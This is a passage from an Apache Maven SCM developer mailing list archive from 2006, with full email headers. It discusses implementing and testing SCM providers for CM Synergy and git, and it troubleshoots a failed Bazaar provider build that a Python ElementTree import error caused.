<http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-test/> > > And a reference provider eg. maven-scm-provider-bazaar/ > <http://svn.apache.org/viewcvs.cgi/maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/> > Perhapes choose one that is most similar to the CM Synergy > >> What class or interfaced do I need to implement? > > What I did was change the implementation of an existing provider. > That way I got fast results and I learned the API one step at the time. > > > Basically what you need to implements is an (Abstract)ScmProvider and its commands. > >> How can I test my provider? > > 1. Run unit tests from your IDE > The test classes in maven-scm-test was really helpfull to me. Try to include a tck test > > as soon as possible. See how the tck tests are implemented in the reference provider (its a no brainer :). > > It can be a bit tricky to setup your IDE to pickup your current modifications and not the installed > > version of the provider. Let me know it this becomes a problem. > > 2. Build and install the provider and test it with eg. "mvn scm:checkout" on a project where > you have defined a scm url in the pom.xml. > > > This was probably a too short answer. But if you post your questions as they come, > I'll do my best to help you. And in the end I like to make a mave-scm howto webpage > with all of this. > > Good luck, > Torbjørn > From [email protected] Thu Mar 23 08:33:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31076 invoked from network); 23 Mar 2006 08:33:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2006 08:33:29 -0000 Received: (qmail 25719 invoked by uid 500); 23 Mar 2006 08:33:28 -0000 Delivered-To: [email protected] Received: (qmail 25610 invoked by uid 500); 23 Mar 2006 08:33:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 25557 invoked by uid 99); 23 Mar 2006 08:33:27 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 00:33:27 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 00:33:26 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Thu, 23 Mar 2006 08:33:03 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Thu, 23 Mar 2006 08:32:58 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Thu, 23 Mar 2006 08:32:57 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Thu, 23 Mar 2006 08:32:47 +0000 (GMT) Date: Thu, 23 Mar 2006 09:32:47 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: RE: Implementing support for CM Synergy? In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N >> How can I test my provider? > You can extend the ScmTestCase class. I don't use the command test > classes in org.apache.maven.scm.tck.command.*, because they requires a > test repository model which seems to be under development, because it > differs between the command test classes. Yes, the test repository model should be more centralized. But if you just comply with the javadoc when implementing the ScmTckTestCase.initRepo() method, things should be fairly straight forward. The model (ie the initRepo) is the same for all commands... > Running the JUnit test from eclipse doesn't work, you must call 'mvn test'. I remember that I struggled a bit to set this up but I'm running the JUnit tests from eclipse. I think the Maven 2.0 plugin for eclipse did the trick... Regards Torbjørn From [email protected] Thu Mar 23 08:50:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40321 invoked from network); 23 Mar 2006 08:50:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2006 08:50:18 -0000 Received: (qmail 58857 invoked by uid 500); 23 Mar 2006 08:50:13 -0000 Delivered-To: [email protected] Received: (qmail 58716 invoked by uid 500); 23 Mar 2006 08:50:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 58299 invoked by uid 99); 23 Mar 2006 08:50:11 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 00:50:11 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 23 Mar 2006 00:50:10 -0800 Received: (qmail 6380 invoked from network); 23 Mar 2006 08:49:50 -0000 Received: from 251.29.98-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 23 Mar 2006 08:49:50 -0000 Message-ID: <[email protected]> Date: Thu, 23 Mar 2006 09:49:41 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: git repository provider References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N What is a git archive? Emmanuel Dominik Winter a écrit : > Hi, > > it seems that nobody works on a git provider so far. So I started to > implement one. Creating an archive ("repository"), adding files, > checking out and committing changes work already. > > I use git itself as the SCM, of course. But I have no public place to > host the git archive, yet. > Any suggestions? > > Regards, > 0x7f0c > > > From [email protected] Thu Mar 23 10:29:17 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87177 invoked from network); 23 Mar 2006 10:27:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2006 10:27:50 -0000 Received: (qmail 18958 invoked by uid 500); 23 Mar 2006 10:27:03 -0000 Delivered-To: [email protected] Received: (qmail 18934 invoked by uid 500); 23 Mar 2006 10:27:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 18923 invoked by uid 99); 23 Mar 2006 10:27:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 02:27:02 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO zproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 02:27:01 -0800 Received: by zproxy.gmail.com with SMTP id i11so442532nzh for <[email protected]>; Thu, 23 Mar 2006 02:26:40 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=googlemail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=lx3qATVUARqso0bDqgkLfDC6lQQi5M9mD495WInSOfbEdEhDmSqSQo3Qyb7A9huPPX24YhOZ/EoE2bxAlJ992JZ8X5vpc++NNv0GHZa0OGdn3aDqCT7pSLDDca1lLBP7gCRZz27lHhr1NoL507kmkv0y1Gigfb2eXoQkqAJERJE= Received: by 161.129.204.104 with SMTP id x20mr908969nzi; Thu, 23 Mar 2006 02:26:40 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 23 Mar 2006 02:26:40 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 23 Mar 2006 11:26:40 +0100 From: "Dominik Winter" <[email protected]> To: [email protected] Subject: Re: git repository provider In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_729_4218194.1143109600638" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N ------=_Part_729_4218194.1143109600638 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline 2006/3/23, Emmanuel Venisse <[email protected]>: > > What is a git archive? The repository directory. ------=_Part_729_4218194.1143109600638 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline 2006/3/23, Emmanuel Venisse &lt;<a href=3D"mailto:[email protected]">emm= [email protected]</a>&gt;:<div><span class=3D"gmail_quote"></span><blockquo= te class=3D"gmail_quote" style=3D"border-left: 1px solid rgb(204, 204, 204)= ; margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> What is a git archive?</blockquote><div><br>The repository directory.<br></= div></div> ------=_Part_729_4218194.1143109600638-- From [email protected] Thu Mar 23 11:39:24 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26195 invoked from network); 23 Mar 2006 11:39:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Mar 2006 11:39:22 -0000 Received: (qmail 52633 invoked by uid 500); 23 Mar 2006 11:39:04 -0000 Delivered-To: [email protected] Received: (qmail 52580 invoked by uid 500); 23 Mar 2006 11:39:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 52559 invoked by uid 99); 23 Mar 2006 11:39:04 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 03:39:04 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 23 Mar 2006 03:39:03 -0800 Received: (qmail 838 invoked from network); 23 Mar 2006 11:38:44 -0000 Received: from 251.29.98-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 23 Mar 2006 11:38:44 -0000 Message-ID: <[email protected]> Date: Thu, 23 Mar 2006 12:38:29 +0100 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: git repository provider References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N is it possible to run git locally? in this case, you can use the TCK and create the repository in target directory with initRepo method. You can look at other providers like bazaar that do it. Emmanuel Dominik Winter a écrit : > 2006/3/23, Emmanuel Venisse <[email protected] > <mailto:[email protected]>>: > > What is a git archive? > > > The repository directory. From [email protected] Fri Mar 24 07:03:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16182 invoked from network); 24 Mar 2006 07:03:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 07:03:45 -0000 Received: (qmail 38755 invoked by uid 500); 24 Mar 2006 07:03:45 -0000 Delivered-To: [email protected] Received: (qmail 38737 invoked by uid 500); 24 Mar 2006 07:03:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 38726 invoked by uid 99); 24 Mar 2006 07:03:44 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 23:03:44 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail-ihug.icp-qv1-irony5.iinet.net.au) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 23:03:43 -0800 Received: from 203-206-245-117.dyn.iinet.net.au (HELO [161.129.204.104]) ([161.129.204.104]) by mail-ihug.icp-qv1-irony5.iinet.net.au with ESMTP; 24 Mar 2006 15:03:19 +0800 X-BrightmailFiltered: true X-Brightmail-Tracker: AAAAAA== X-IronPort-AV: i="4.03,124,1141574400"; d="scan'208"; a="697077959:sNHT122211936" Message-ID: <[email protected]> Date: Fri, 24 Mar 2006 18:03:15 +1100 From: Brett Porter <[email protected]> User-Agent: Thunderbird 1.5 (Windows/20051201) MIME-Version: 1.0 To: [email protected] Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Any ideas on this? bzr 0.7 seems to be properly installed now. Can the output of the tests be improved? - Brett Continuum Build Server wrote: > Online report : http://ci.codehaus.org/continuum-maven/servlet/continuum/target/ProjectBuild.vm/view/ProjectBuild/id/66/buildId/714 > Build statistics: > State: Failed > Previous State: Failed > Started at: Thu, 23 Mar 2006 22:50:10 -0800 > Finished at: Thu, 23 Mar 2006 22:50:20 -0800 > Total time: 10s > Build Trigger: Forced > Exit code: 1 > Building machine hostname: cheddar.simulalabs.com > Operating system : Linux(unknown) > Java version : 1.5.0_03(Sun Microsystems Inc.) > > Changes > No files changed > > **************************************************************************** > Output: > **************************************************************************** > [INFO] Scanning for projects... > [INFO] ---------------------------------------------------------------------------- > [INFO] Building Maven SCM Bazaar Provider > [INFO] task-segment: [clean, install] > [INFO] ---------------------------------------------------------------------------- > [INFO] [clean:clean] > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target/classes > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target/test-classes > [INFO] [resources:resources] > [INFO] Using default encoding to copy filtered resources. > [INFO] [compiler:compile] > Compiling 19 source files to /home/nobody/continuum-maven/working-directory/66/target/classes > [INFO] [resources:testResources] > [INFO] Using default encoding to copy filtered resources. > [INFO] [compiler:testCompile] > Compiling 7 source files to /home/nobody/continuum-maven/working-directory/66/target/test-classes > [INFO] [surefire:test] > [INFO] Setting reports dir: /home/nobody/continuum-maven/working-directory/66/target/surefire-reports > > ------------------------------------------------------- > T E S T S > ------------------------------------------------------- > [surefire] Running org.apache.maven.scm.provider.bazaar.command.checkin.BazaarCheckInCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme.txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/main/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/test/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme.txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/main/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/test/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 2, Failures: 0, Errors: 2, Time elapsed: 1.622 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.checkout.BazaarCheckOutCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme.txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/main/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/test/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.641 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.status.BazaarStatusCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme.txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/main/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/test/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.606 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.diff.BazaarDiffCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme.txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/main/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/test/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.599 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.update.BazaarUpdateCommandTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme.txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/main/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/test/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.664 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogCommandTckTest > EXECUTING: bzr init > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeEXECUTING: bzr add /home/nobody/continuum-maven/working-directory/66/target/test-branch/pom.xml /home/nobody/continuum-maven/working-directory/66/target/test-branch/readme.txt /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/main/java/Application.java /home/nobody/continuum-maven/working-directory/66/target/test-branch/src/test/java/Test.java > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTreeBazaar version: Unknown > Working directory: /home/nobody/continuum-maven/working-directory/66/target/test-branch > failed to open trace file: [Errno 13] Permission denied: '/.bzr.log' > [ERROR] exceptions.ImportError: No module named elementtree.ElementTree[surefire] Tests run: 1, Failures: 0, Errors: 1, Time elapsed: 0.562 sec <<<<<<<< FAILURE !! > [INFO] ---------------------------------------------------------------------------- > [ERROR] BUILD ERROR > [INFO] ---------------------------------------------------------------------------- > [INFO] There are test failures. > [INFO] ---------------------------------------------------------------------------- > [INFO] For more information, run Maven with the -e switch > [INFO] ---------------------------------------------------------------------------- > [INFO] Total time: 9 seconds > [INFO] Finished at: Thu Mar 23 22:50:20 PST 2006 > [INFO] Final Memory: 8M/125M > [INFO] ---------------------------------------------------------------------------- > > **************************************************************************** > > From [email protected] Fri Mar 24 07:45:41 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37329 invoked from network); 24 Mar 2006 07:45:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Mar 2006 07:45:41 -0000 Received: (qmail 73723 invoked by uid 500); 24 Mar 2006 07:45:40 -0000 Delivered-To: [email protected] Received: (qmail 73672 invoked by uid 500); 24 Mar 2006 07:45:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 73661 invoked by uid 99); 24 Mar 2006 07:45:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 23:45:40 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.slb.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 23 Mar 2006 23:45:39 -0800 Received: from pmxchannel_int-daemon.eurmta01.london.eur.slb.com by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) id <[email protected]> for [email protected]; Fri, 24 Mar 2006 07:45:17 +0000 (GMT) Received: from gb0135clu01.mail.slb.com (gb0135clu01.mail.slb.com [161.129.204.104]) by eurmta01.london.eur.slb.com (iPlanet Messaging Server 5.2 Patch 2 (built Jul 14 2004)) with ESMTP id <[email protected]> for [email protected]; Fri, 24 Mar 2006 07:45:17 +0000 (GMT) Received: from pmxchannel-daemon.gb0135mbx01.mail.slb.com by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) id <[email protected]> for [email protected]; Fri, 24 Mar 2006 07:45:16 +0000 (GMT) Received: from TSMOERGRAVOFS ([161.129.204.104]) by gb0135mbx01.mail.slb.com (Sun Java System Messaging Server 6.2-1 (built Feb 24 2005)) with ESMTPSA id <[email protected]> for [email protected]; Fri, 24 Mar 2006 07:45:16 +0000 (GMT) Date: Fri, 24 Mar 2006 08:45:16 +0100 From: =?iso-8859-1?Q?Torbj=F8rn_Sm=F8rgrav?= <[email protected]> Subject: RE: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider In-reply-to: <[email protected]> To: [email protected] Message-id: <[email protected]> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2900.2180 X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Have you tested Bazaar manually? Form the test log it clear that every command fails due to an import error in Bazaar. Check if the cElementTree module is installed properly by running: $ python -c "import cElementTree" Torbjørn -----Original Message----- From: Brett Porter [mailto:[email protected]] Sent: 24. mars 2006 08:03 To: [email protected] Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider Any ideas on this? bzr 0.7 seems to be properly installed now. Can the output of the tests be improved? - Brett Continuum Build Server wrote: > Online report : http://ci.codehaus.org/continuum-maven/servlet/continuum/target/ProjectBuild .vm/view/ProjectBuild/id/66/buildId/714 > Build statistics: > State: Failed > Previous State: Failed > Started at: Thu, 23 Mar 2006 22:50:10 -0800 > Finished at: Thu, 23 Mar 2006 22:50:20 -0800 > Total time: 10s > Build Trigger: Forced > Exit code: 1 > Building machine hostname: cheddar.simulalabs.com > Operating system : Linux(unknown) > Java version : 1.5.0_03(Sun Microsystems Inc.) > > Changes > No files changed > > **************************************************************************** > Output: > **************************************************************************** > [INFO] Scanning for projects... > [INFO] --------------------------------------------------------------------- ------- > [INFO] Building Maven SCM Bazaar Provider > [INFO] task-segment: [clean, install] > [INFO] --------------------------------------------------------------------- ------- > [INFO] [clean:clean] > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target/classes > [INFO] Deleting directory /home/nobody/continuum-maven/working-directory/66/target/test-classes > [INFO] [resources:resources] > [INFO] Using default encoding to copy filtered resources. > [INFO] [compiler:compile] > Compiling 19 source files to /home/nobody/continuum-maven/working-directory/66/target/classes > [INFO] [resources:testResources] > [INFO] Using default encoding to copy filtered resources. > [INFO] [compiler:testCompile] > Compiling 7 source files to 